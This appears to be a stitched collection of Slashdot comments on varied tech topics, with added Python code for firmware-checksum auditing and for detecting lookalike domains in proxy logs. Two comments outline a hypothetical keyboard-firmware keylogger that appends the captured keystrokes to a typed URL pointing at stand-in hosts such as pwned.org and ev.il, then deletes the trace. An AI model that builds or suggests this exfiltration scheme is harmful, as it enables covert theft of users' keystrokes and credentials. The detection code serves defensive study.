yep, one of the shortest threads on Slashdot before it hit. Anyone know of a shorter one? A First Post Nazi perhaps?
That's one small step for man, a giant leap for the Greys.
$ ed parentpost
474
1
Sadly, I believe that article is quite out of date. Pointers and recursion are so passé to most IT
s/most/current/
s/$/./
1
Sadly, I believe that article is quite out of date. Pointers and recursion are so passé to current IT
wq
478
$
Sadly, I believe that article is quite out of date. Pointers and recursion are so passé to most IT
I think today's programmers are said to be horribly out of it when they don't know how to apply the Distributed Observer Pattern to RESTful business logic as a ROA with declarative state transformation rules.
I'm such a useless old fart to today's programming requirements that I'll content myself with some lowly kernel hacking, SAT solver tuning and code optimization.
They can't even give correct change from a pounder...
so they will plonk down a program to do it on their Android phone in an instant.
No, I REFUSE to say iPhone...cue up a large and menacing Apple high up in a tree, poised to fall on to me and smother me with gravity-laden but no less fruity court injunctions...
Fluff!! The lowly navel lint that may turn out to be the key ingredient to obtaining visions of the future that may save the universe!
Thanks very much for the info. I'll be looking forward to some very interesting developments in this field.
Pseudonym, pardon me for 'hijacking' this thread, but since you work for NICTA and I'm very interested in this result, I would like to ask:
In the summary, 'verified' and 'unverified' ports are mentioned. Does 'verified' in this context mean: formally proven hardware and compiler design?
Reason I ask is that having a formally proven kernel is of much less practical use when the generated binary doesn't implement the source code correctly, or the hardware doesn't execute the instructions given correctly.
That's the reason why I'm very much in favor of calling them Reds and Blues. In a few years people will have forgotten what these stood for, and actually look at their political agenda when deciding their vote.
Somewhat like someone further up in the thread suggested, use the oldest rule in the mob: take the lion statuette and break it in two. The parts don't come together again until the deal is done.
Split the task in two, have one in-house party guard the keys and crypto but have no access to any databases, files or networks except to provide those directly to staff.
Have another (possibly outsourced) party guard the (encrypted) files and backups, but have them have no access to any keys or crypto. The only network connection between the two should always carry encrypted data.
Under NO circumstances should any party know anything about the other party. Only trusted staff members should deal with either.
That way neither party has anything of value if they compromise their part of the deal.
Douglas Adams was right!
The role of President is to attract attention so no-one knows who's really in charge.
The real President can be anyone, even a solipsistic crazy old man whose only company is his cat.
...is unable to comment (yet).
I wonder when they will start outfitting little kids with monitors (implants, keyloggers, Trojaned webcams, Palm Pre's?) to find out if they are promising recruits to send to Battle School (ROTC?), and who they will eventually pick to fight the Buggers (drug lords, Islam, "ze Terrurists", anti-Capitalists?) for them.
It all depends on whether you see the same cat (or one that looks just like it) pass the same location twice. If you do, that's a déjà vu, and there's a very good chance that they changed something in the Matrix.
Yahoo need to pull their asses out of the Stone Age and join the 21st century and learn to build websites. Two years probation or risk being put in a padded room with the rest of them "mistake HTML for a screen publishing language" reject DTPers with only the W3C compendium on the history and purpose of HTML as a medium-independent markup language for company. Periodical flogging with a 300px x 200px flyswat should be part of daily routine.
If (in the 1900s, or being very rich) I would contract an errand boy or courier to fetch my newspaper at the stand every day and bring it to me, would it be reasonable for the newspaper publisher to know my personal details? I think not.
Today, the newspaper boy or courier is replaced by programs stored on a computer that checks lists of Kindle users who subscribe to newspaper delivery services, fetches one copy of the paper from the publisher every day, and delivers that to Kindles. Any difference with the first example? I think not.
PP and GPP: good points. The more I think about it, fraud seems actually to be the most likely here.
AP selling licenses to things it cannot grant a license to. Now compare this to someone selling tickets to concerts on a website, for the sale of which he has no license. A classic example of fraud. To make things worse, in this analogy, AP allows people to fill in the name of the act and the name of the venue themselves!
If it is still true that Flash memory lasts a limited number of write cycles, reflashing on every boot would eventually kill your devices.
I think it would be better to (periodically) checksum all firmware on devices and raise an alarm if there is any mismatch.
Think outside the box, analyze patterns.
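The periodic firmware checksum suggested above, sketched as an added example that is not part of the original comments. It assumes each device's firmware has already been read out to a `*.bin` file in one directory by a device-specific tool, and that the HMAC key is kept off the audited machine; all function names are hypothetical. Reading and hashing never writes to flash, so the wear concern does not apply.

```python
import hashlib
import hmac
import json
from pathlib import Path

def digest(path, chunk=1 << 16):
    """SHA-256 of one firmware dump, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def build_baseline(dump_dir):
    """Map dump file name -> digest for every *.bin in dump_dir (assumed layout)."""
    return {p.name: digest(p) for p in sorted(Path(dump_dir).glob("*.bin"))}

def seal(baseline, key):
    """HMAC over the manifest so a tampered manifest is itself detectable."""
    blob = json.dumps(baseline, sort_keys=True).encode()
    return hmac.new(key, blob, hashlib.sha256).hexdigest()

def audit(dump_dir, baseline, tag, key):
    """Return sorted (name, status) findings; raise if the manifest was altered."""
    if not hmac.compare_digest(seal(baseline, key), tag):
        raise ValueError("baseline manifest failed its integrity check")
    current = build_baseline(dump_dir)
    findings = []
    for name, known in baseline.items():
        if name not in current:
            findings.append((name, "missing"))
        elif current[name] != known:
            findings.append((name, "modified"))
    # Dumps with no baseline entry are reported too: a new device is worth a look.
    findings += [(n, "unexpected") for n in current.keys() - baseline.keys()]
    return sorted(findings)
```

A readout served by the device's own firmware can be falsified by that firmware, so dumps taken through an external programmer are the stronger input.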
An example (somewhat better worded than the one I gave in an earlier post, I hope) as seen from the keyboard's perspective:
- Wait for the user to finish typing in a (simple) URL by hitting the Enter key.
(Most often, the cursor is now in the URL bar of a browser. It could be that the user is just typing a note or an email, but there are solutions to that, too.)
Example: google.com
- Add a string consisting of ".[name of server]/s=[URL encoded string containing keylog buffer]".
Example of the final URL: google.com.pwned.org/s=Logged%20Data%20In%20Buffer
- Add an Enter
- Perhaps wait a tiny amount of time for the browser to start connecting to the site
- Now, for cleanup in case the user is just writing a document, send the appropriate number of [Delete Word] keystrokes, to restore the URL to the user's original input (on a PC, this would be Ctrl-Backspace, not ^W because this often closes the current window).
Note: of course the keyboard should send the data as quickly as possible to give the user no chance to abort the operation by unplugging it.
The virtual website at google.com.pwned.org (mapped from *.pwned.org) could redirect the user to google.com, but since the data has already been sent, this doesn't matter very much.
Soon, that question will be rephrased:
How many people do you know that have a microwave oven that's NOT connected to the 'net in some way? So that they can go to the little nuker's website from work to program it so they can have a hot steamy pizza right when they get home from working late?
Oops, hacker got there first, now my house's on fire...
What's up next, maintenance heated USB slippers? maintenance HDMI cables?
Security by this kind of obscurity is going to kill us all.
"You know, I bought this USB pogo stick for my Wii, and after using it for a while, my bank account got berserk. The bank manager told me that the pogo stick must have raided my bank account while I was trying out this new online banking thingy on the Wii..."
It's like reverse engineering your old school ball mouse.
I think there must be at least one coke pusher out there who has considered that option. Anyone like to have a mouseball?
...and periodically sends its cachehold of data to the remnants of the Third Reich in hiding?
s/USA/China/g
I reckon that China's shipped about 3 and a quarter bazillion keyboards worldwide by now.
Care to check them all for Flash firmware 'stowaways'?
addendum: ...the user types something like:
persiankitty.com
[and hits the Enter key]
then the keyboard quickly expands this... ...and adds back the Enter key at the end.
haa, just wait until the user types something like:
persiankitty.com
then the keyboard quickly expands this to something like:
persiankitty.com.ev.il/s=[url encoded keylog buffer]
in the blink of an eye.
Simply make ev.il be on a really fast server that immediately redirects the user to persiankitty.com so as not to notice anything... (sorry Israelis, don't want to make you look bad (well, except maybe the Mossad, cough...), except ev.il's a convenient suffix)
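A detection-side counterpart to the URL-expansion posts above, as an added example that is not part of the original comments: it scans proxy log lines for hosts that carry a commonly typed domain as a prefix of some other domain, which is the shape of `google.com.pwned.org` and `persiankitty.com.ev.il`. The log format, the watch list, the allowlist and the function names are assumptions made for the sketch, and the log lines are constructed.

```python
from urllib.parse import unquote, urlsplit

WATCHED = ("google.com", "persiankitty.com")  # domains users type; from the thread
ALLOWED = ("google.com.au",)                  # assumed allowlist for real ccTLD sites

# Constructed proxy log lines: "<time> <client> <method> <url>"
SAMPLE_LOG = """\
2009-08-01T09:00:01 10.0.0.5 GET http://google.com/
2009-08-01T09:00:02 10.0.0.5 GET http://mail.google.com/inbox
2009-08-01T09:00:03 10.0.0.7 GET http://google.com.pwned.org/s=Logged%20Data%20In%20Buffer
2009-08-01T09:00:04 10.0.0.8 GET http://www.google.com.au/
2009-08-01T09:00:05 10.0.0.9 GET http://persiankitty.com.ev.il/s=abc%20def
""".splitlines()

def embedded_domain(host, watched=WATCHED, allowed=ALLOWED):
    """Return the watched domain found inside host when it is not host's suffix."""
    host = host.lower().rstrip(".")
    if any(host == a or host.endswith("." + a) for a in allowed):
        return None
    labels = host.split(".")
    for w in watched:
        wl = w.split(".")
        # Stop before the suffix position, so mail.google.com is never flagged.
        for i in range(len(labels) - len(wl)):
            if labels[i:i + len(wl)] == wl:
                return w
    return None

def scan(lines):
    """Return one finding per log line whose host imitates a watched domain."""
    findings = []
    for line in lines:
        when, client, _method, url = line.split(maxsplit=3)
        parts = urlsplit(url)
        host = parts.hostname or ""
        brand = embedded_domain(host)
        if brand:
            # Record only the size of the decoded payload, not its content.
            payload = unquote(parts.path + parts.query)
            findings.append({"time": when, "client": client, "host": host,
                             "imitates": brand, "payload_chars": len(payload)})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same label check works on DNS query logs, where the lookup for the long host name shows up even if the redirect hides the page from the user.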